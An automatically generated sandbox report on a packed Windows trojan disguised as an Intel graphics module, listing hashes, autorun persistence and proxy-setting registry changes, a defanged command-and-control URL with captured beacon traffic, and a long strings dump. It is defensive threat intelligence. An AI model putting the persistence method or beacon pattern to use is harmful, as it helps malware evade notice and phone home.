Trojan.GenericKD.3687237_f97162f035

by malwarelabrobot on November 22nd, 2016 in Malware Descriptions.

Trojan.GenericKD.3687237 (B) (Emsisoft), Trojan.GenericKD.3687237 (AdAware), GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: f97162f035314ea96a7edd7ee7e58005
SHA1: c1033f0de42c52cfed8ad226de04272dde4322cf
SHA256: c7e4add89df78bef818bf6cdd00925d57a7de0b6fe068aa8855c1ad222c1e1c1
SSDeep: 49152:KlOTN6ZHJtvTQJrJFBPPCZP8hP9jRH0E3LyDc/uGyb4ql:COxeJtrQJBPk8hltFYc/uDc
Size: 1896448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2016-10-28 14:39:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2340

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:2340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "70 80 84 E5 0F 44 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "70 80 84 E5 0F 44 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"%original file name%.exe -start" = "c:\%original file name%.exe -start"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Intel Corporation
Product Name: Intel(R) Common User Interface
Product Version: 6.15.10.4425
Legal Copyright: Copyright 2012-2015, Intel Corporation
Legal Trademarks:
Original Filename: GFXUIEX.EXE
Internal Name: GFXUIEX
File Version: 6.15.10.4425
File Description: GFXUIEX Module
Comments:
Language: Language Neutral

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             203650        0         0        d41d8cd98f00b204e9800998ecf8427e
.rdata  208896           5692          0         0        d41d8cd98f00b204e9800998ecf8427e
.data   217088           1101240       0         0        d41d8cd98f00b204e9800998ecf8427e
.vmp0   1318912          1160212       0         0        d41d8cd98f00b204e9800998ecf8427e
.vmp1   2482176          1729896       1732608   5.48343  9cc49c4d5d51cec7f8ebe4bfb386a870
.rsrc   4214784          156784        159744    4.52362  75cc0fc2a17307ebef862753093c6295

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.faceboolad.com/api//send


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: KLzM9LxLuLbLzMsMzM7L6LCM2LwMwMWM4MmMWMFMFMiMWM4MFMwMOM7LCMLL4MWMUMtMCMWMCM4MFMLLtMtMmMxM7LzMcMzMWLpLtLbLzMsMxMcMzMiLbLmLzMsMzMdLDLwLuLxLOLFLnMUMnMrLaLWLDL1LRLWLbLnM7LuLDLWLDLxLwLnMvLbLmLiLDL9LbLnM5LRL9L4LnMxMnMsLiMWMnMkMjLULDLaLuLsMUMWMwMxMfMzMcMzMSLmLxLOLFLbLmLzMsMzMzMcMzMULFLbLmLzMsMzMzMcMzMtLRLFLFLzMsMzMzMcMzM9LxLxL4LDLbLFLzMsMzMzMcMzMRLDLuLzMsMwMcMzMULWLpLtLbLzMsMwMBT
Server-Key: MBZ2j6h7LINEXG38TP5oYvyrHdJ0lAgqnQzRS9ubkfVDc4a1wxtCmFWUiOspeK
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: x0ZiEwlSg3FWKj82yNp5mJOeMhUXQ47cYu6DnLPasotBrbqvfkC9TGHdR1VIzA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:56:56 GMT



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: zJCEZJFJkJyJCEqECEgJRJNEHJmEmEBEfEuEBErErE5EBEfErEmETEgJNEJJfEBElEhENEBENEfErEJJhEhEuEFEgJCEwECEBJsJhJyJCEqEFEwECE5JyJuJCEqECEeJvJmJkJFJTJrJPElEPEdJaJBJvJSJMJBJyJPEgJkJvJBJvJFJmJPEYJyJuJ5JvJZJyJPEcJMJZJfJPEFEPEqJ5EBEPEnEpJlJvJaJkJqElEBEmEFEoECEwECE7JuJFJTJrJyJuJCEqECECEwECElJrJyJuJCEqECECEwECEhJMJrJrJCEqECECEwECEZJFJFJfJvJyJrJCEqECECEwECEMJvJkJCEqEmEwECElJBJsJhJyJCEqEmE02
Server-Key: 0EHIRpgVbJiGxD1Wt28cY4d3eKUjLAXO6PMCZ7ykonv9fwSaFmNhrulBT5sqzQ
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: JsixuTmEf5lD3og2qQaWIbrdOC6KXZ9kHRyVvM8NFGpzPLSc04wt7Bj1UYnheA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:57:17 GMT



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: CcHiOcLc7cmcHi3iHitcucUifcNiNiDiYiaiDibibiriDiYibiNiTitcUiccYiDiviJiUiDiUiYibiccJiJiaiLitcHiQiHiDcKcJcmcHi3iLiQiHircmcacHi3iHijcBcNc7cLcTcbcMiviMiScxcDcBc8cqcDcmcMitc7cBcDcBcLcNcMizcmcacrcBcOcmcMiycqcOcYcMiLiMi3criDiMidiEcvcBcxc7c3iviDiNiLiFiHiQiHi9cacLcTcbcmcacHi3iHiHiQiHivcbcmcacHi3iHiHiQiHiJcqcbcbcHi3iHiHiQiHiOcLcLcYcBcmcbcHi3iHiHiQiHiqcBc7cHi3iNiQiHivcDcKcJcmcHi3iNioI
Server-Key: ioVfEuRtc5l6hgP4Iny0AzsSejkWw1ZpMXHq9O7mdFGBQYx8NLJUabDvrT3K2C
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: LGSewnNmkyBgdjRZ9V5fIKsvDEzQHhiY36pbM2TCX7tcu4xlaJrFOWqoU018PA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:57:37 GMT


The Trojan connects to the servers at the following location(s):

%original file name%.exe_2340:

.text
`.rdata
@.data
.vmp0
.vmp1
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
GDI32.dll
WINMM.dll
@.reloc
large file support is disabled
unknown operation
SQL logic error or missing database
rekey
hexrekey
hexkey
foreign_keys
foreign_key_list
foreign_key_check
defer_foreign_keys
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_crypt
sqlite_log
sqlite_source_id
sqlite_version
sqlite_attach
sqlite_detach
sqlite_stat4
sqlite_stat3
sqlite_stat1
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_table
FOREIGN KEY
GetProcessHeap
RowKey
3.9.2
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
@failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
Adelayed %dms for lock/sharing conflict at line %d
sqlite_user
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
SQLITE_
os_win.c:%d: (%lu) %s(%s) - %s
%s%c%s
%s(%d)
FOREIGN KEY constraint failed
%s prohibited in %s
%r %s BY term out of range - should be between 1 and %d
Expression tree is too large (maximum depth %d)
too many SQL variables
variable number must be between ?1 and ?%d
too many columns in %s
%s OR name=%Q
type='trigger' AND (%s)
table %s may not be altered
sqlite_
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
duplicate column name: %s
too many columns on %s
DELETE FROM %Q.%s WHERE %s=%Q
sqlite_stat%d
cannot modify %s because it is a view
table %s may not be modified
foreign key mismatch - "%w" referencing "%w"
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
table %s: xBestIndex returned an invalid plan
no such vfs: %s
%s mode not allowed: %s
no such %s mode: %s
FROM '%q'.'%q%s' AS x
,%s(x.'c%d%q')
,%s(?)
unknown tokenizer: %s
unrecognized matchinfo request: %c
>reserved fts5 column name: %s
unrecognized column option: %s
unindexed
-near %d
-col {%d
-col %d
, %d)
%s%s%z%s
no such tokenizer: %s
hex literal too big: %s
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
a JOIN clause is required before %s
duplicate WITH table name: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
sqlite3_
unable to open shared library [%s]
%s.%s
sqlite3_extension_init
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
recursive reference in a subquery: %s
multiple recursive references: %s
table %s has %d values for %d columns
circular reference: %s
multiple references to recursive table: %s
SCAN TABLE %s%s%s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor called recursively: %s
no such module: %s
%s.xBestIndex() malfunction
prefix length out of range: %d
%s-shm
unable to use function %s in the requested context
CREATE TABLE %Q.%s(%s)
%s %T cannot reference objects in database %s
sqlite_master
sqlite_temp_master
default value of column [%s] is not constant
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
%s.rowid
no such collation sequence: %s
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
column%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
too many arguments on %s() - max %d
json_%s() needs an odd number of arguments
parse error in rank function: %s
%s: %s
%s: %s.%s
%s: %s.%s.%s
misuse of aliased aggregate %s
not authorized to use function: %s
the "." operator
too many terms in %s BY clause
%.*s"%w"%s
%s%.*s"%w"
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
automatic extension loading failed: %s
illegal first argument to %s
%s {%s}
d-d-d d:d:d
d:d:d
d-d-d
view %s is circularly defined
recursive aggregate queries not supported
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
zeroblob(%d)
sqlite3_get_table() called with two or more incompatible queries
ANY(%s)
VIRTUAL TABLE INDEX %d:%s
USING INTEGER PRIMARY KEY (rowid%s?)
INDEX %s
COVERING INDEX %s
PRIMARY KEY
AS %s
TABLE %s
SUBQUERY %d
, T.c%d
%Q.'%q_%s'
parse error in "%s"
reserved fts5 table name: %s
no such column: %s
{%ssegid=%d h=%d pgno=%d}
{id=%d leaves=%d..%d}
{lvl=%d nMerge=%d nSeg=%d
%d(%lld)
porter
?API call with %s database connection pointer
cannot limit WAL size: %s
2nd reference to page %d
invalid page number %d
automatic index on %s(%s)
database corruption at line %d of [%.10s]
recovered %d frames from WAL file %s
bind on a busy prepared statement: [%s]
%z - %s
malformed database schema (%s)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
freelist leaf count too big on page %d
recovered %d pages from %s
unknown database: %s
Fragmentation of %d bytes reported as %d on page %d
Multiple uses for byte %u of page %d
Offset %d out of range %d..%d
On page %d at right child:
On tree page %d cell %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
Page %d:
Pointer map page %d is referenced
Page %d is never used
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
at most %d tables in a join
unknown database %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
MJ delete: %s
-mjX9X
MJ collide: %s
%s-mjXXXXXX9XXz
database %s is locked
cannot detach database %s
no such database: %s
database schema is locked: %s
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
SELECT %s WHERE rowid = ?
INSERT INTO %Q.'%q_content' VALUES(%s)
SELECT %s WHERE rowid=?
SELECT %s FROM %s AS T
REPLACE INTO %Q.'%q_content' VALUES(%s)
SELECT %s FROM %s T WHERE T.%Q=?
SELECT %s FROM %s T WHERE T.%Q <= ? AND T.%Q >= ? ORDER BY T.%Q DESC
SELECT %s FROM %s T WHERE T.%Q >= ? AND T.%Q <= ? ORDER BY T.%Q ASC
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_content'(%s)
%z, 'c%d%q'
docid INTEGER PRIMARY KEY
ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';
fts5: error creating shadow table %q_%s: %s
CREATE TABLE %Q.'%q_%q'(%s)%s
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
no such trigger: %S
no such table column: %s.%s
malformed MATCH expression: [%s]
FTS expression tree is too large (maximum depth %d)
statement aborts at %d: [%s] %s
abort at %d in [%s]: %s
%s constraint failed
%s constraint failed: %s
database table is locked: %s
cannot change %s wal mode from within a transaction
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
cannot open savepoint - SQL statements in progress
sqlite_sequence
there is already an index named %s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
unable to identify the object to be reindexed
unsupported encoding: %s
NULL value in %s.%s
*** in database %s ***
no such table: %s
%s.%s.%s
'%s' is not a function
too many references to "%s": max 65535
sqlite_sq_%p
expected %d columns for '%s' but got %d
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot open value of type %s
cannot open %s column for writing
no such column: "%s"
cannot open view: %s
cannot open table without rowid: %s
cannot open virtual table: %s
indexed
foreign key
EXECUTE %s%s SUBQUERY %d
there is already another table or index with this name: %s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_altertab_%s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
expressions prohibited in PRIMARY KEY and UNIQUE constraints
sqlite_autoindex_%s_%d
index %s already exists
there is already a table named %s
virtual tables may not be indexed
views may not be indexed
table %s may not be indexed
cannot create a TEMP index on non-TEMP table "%s"
PRAGMA %Q.page_size
SELECT 1 FROM %Q.sqlite_master WHERE tbl_name='%q_stat'
%s_segments
SELECT stat FROM %Q.sqlite_stat1 WHERE tbl = '%q_rowid'
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
invalid fts5 file format (found %d, expected %d) - run 'rebuild'
wrong number of arguments to function %s
segid, term, pgno, PRIMARY KEY(segid, term)
id INTEGER PRIMARY KEY, block BLOB
%s_data
SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d
SELECT rowid, rank FROM %Q.%Q ORDER BY %s(%s%s%s) %s
no such function: %s
SELECT %s
SELECT count(*) FROM %Q.'%q_%s'
no such fts5 table: %s.%s
SELECT pw=sqlite_crypt(?1,pw), isAdmin FROM "%w".sqlite_user WHERE uname=?2
INSERT INTO sqlite_user(uname,isAdmin,pw) VALUES(%Q,%d,sqlite_crypt(?1,NULL))
CREATE TABLE sqlite_user(
uname TEXT PRIMARY KEY,
UPDATE sqlite_user SET isAdmin=%d, pw=sqlite_crypt(?1,NULL) WHERE uname=%Q
DELETE FROM sqlite_user WHERE uname=%Q
unable to open database: %s
Invalid key value
database %s is already in use
too many attached databases - max %d
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
PRIMARY KEY missing on table %s
%d %d %d %d
k PRIMARY KEY, v
id INTEGER PRIMARY KEY, sz BLOB
, c%d
id INTEGER PRIMARY KEY
misuse of aggregate: %s()
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
SELECT %s ORDER BY rowid %s
%s: table does not support scanning
cannot %s contentless fts5 table: %s
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has no column named %s
-- TRIGGER %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
table %s may not be dropped
sqlite_stat
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
missing %s parameter in fts4 constructor
error parsing prefix parameter: %s
unrecognized order: %s
unrecognized matchinfo: %s
unrecognized parameter: %s
notindexed
%s, %s
CREATE TABLE x(%s
CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
%z, %Q HIDDEN, %s HIDDEN)
%z%s%Q
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessWindowStation
KERNEL32.dll
GetCPInfo
sqlite3.dll
sqlite3_aggregate_context
sqlite3_aggregate_count
sqlite3_auto_extension
sqlite3_backup_finish
sqlite3_backup_init
sqlite3_backup_pagecount
sqlite3_backup_remaining
sqlite3_backup_step
sqlite3_bind_blob
sqlite3_bind_blob64
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_text
sqlite3_bind_text16
sqlite3_bind_text64
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob64
sqlite3_blob_bytes
sqlite3_blob_close
sqlite3_blob_open
sqlite3_blob_read
sqlite3_blob_reopen
sqlite3_blob_write
sqlite3_busy_handler
sqlite3_busy_timeout
sqlite3_cancel_auto_extension
sqlite3_changes
sqlite3_clear_bindings
sqlite3_close
sqlite3_close_v2
sqlite3_collation_needed
sqlite3_collation_needed16
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_bytes16
sqlite3_column_count
sqlite3_column_database_name
sqlite3_column_database_name16
sqlite3_column_decltype
sqlite3_column_decltype16
sqlite3_column_double
sqlite3_column_int
sqlite3_column_int64
sqlite3_column_name
sqlite3_column_name16
sqlite3_column_origin_name
sqlite3_column_origin_name16
sqlite3_column_table_name
sqlite3_column_table_name16
sqlite3_column_text
sqlite3_column_text16
sqlite3_column_type
sqlite3_column_value
sqlite3_commit_hook
sqlite3_compileoption_get
sqlite3_compileoption_used
sqlite3_complete
sqlite3_complete16
sqlite3_config
sqlite3_context_db_handle
sqlite3_create_collation
sqlite3_create_collation16
sqlite3_create_collation_v2
sqlite3_create_function
sqlite3_create_function16
sqlite3_create_function_v2
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_data_count
sqlite3_db_config
sqlite3_db_filename
sqlite3_db_handle
sqlite3_db_mutex
sqlite3_db_readonly
sqlite3_db_release_memory
sqlite3_db_status
sqlite3_declare_vtab
sqlite3_enable_load_extension
sqlite3_enable_shared_cache
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg16
sqlite3_errstr
sqlite3_exec
sqlite3_expired
sqlite3_extended_errcode
sqlite3_extended_result_codes
sqlite3_file_control
sqlite3_finalize
sqlite3_free
sqlite3_free_table
sqlite3_get_autocommit
sqlite3_get_auxdata
sqlite3_get_table
sqlite3_global_recover
sqlite3_initialize
sqlite3_interrupt
sqlite3_key
sqlite3_key_v2
sqlite3_last_insert_rowid
sqlite3_libversion
sqlite3_libversion_number
sqlite3_limit
sqlite3_load_extension
sqlite3_log
sqlite3_malloc
sqlite3_malloc64
sqlite3_memory_alarm
sqlite3_memory_highwater
sqlite3_memory_used
sqlite3_mprintf
sqlite3_msize
sqlite3_mutex_alloc
sqlite3_mutex_enter
sqlite3_mutex_free
sqlite3_mutex_leave
sqlite3_mutex_try
sqlite3_next_stmt
sqlite3_open
sqlite3_open16
sqlite3_open_v2
sqlite3_os_end
sqlite3_os_init
sqlite3_overload_function
sqlite3_prepare
sqlite3_prepare16
sqlite3_prepare16_v2
sqlite3_prepare_v2
sqlite3_profile
sqlite3_progress_handler
sqlite3_randomness
sqlite3_realloc
sqlite3_realloc64
sqlite3_rekey
sqlite3_rekey_v2
sqlite3_release_memory
sqlite3_reset
sqlite3_reset_auto_extension
sqlite3_result_blob
sqlite3_result_blob64
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error16
sqlite3_result_error_code
sqlite3_result_error_nomem
sqlite3_result_error_toobig
sqlite3_result_int
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_subtype
sqlite3_result_text
sqlite3_result_text16
sqlite3_result_text16be
sqlite3_result_text16le
sqlite3_result_text64
sqlite3_result_value
sqlite3_result_zeroblob
sqlite3_result_zeroblob64
sqlite3_rollback_hook
sqlite3_rtree_geometry_callback
sqlite3_rtree_query_callback
sqlite3_set_authorizer
sqlite3_set_auxdata
sqlite3_shutdown
sqlite3_sleep
sqlite3_snprintf
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit64
sqlite3_sourceid
sqlite3_sql
sqlite3_status
sqlite3_status64
sqlite3_step
sqlite3_stmt_busy
sqlite3_stmt_readonly
sqlite3_stmt_status
sqlite3_strglob
sqlite3_stricmp
sqlite3_strnicmp
sqlite3_table_column_metadata
sqlite3_test_control
sqlite3_thread_cleanup
sqlite3_threadsafe
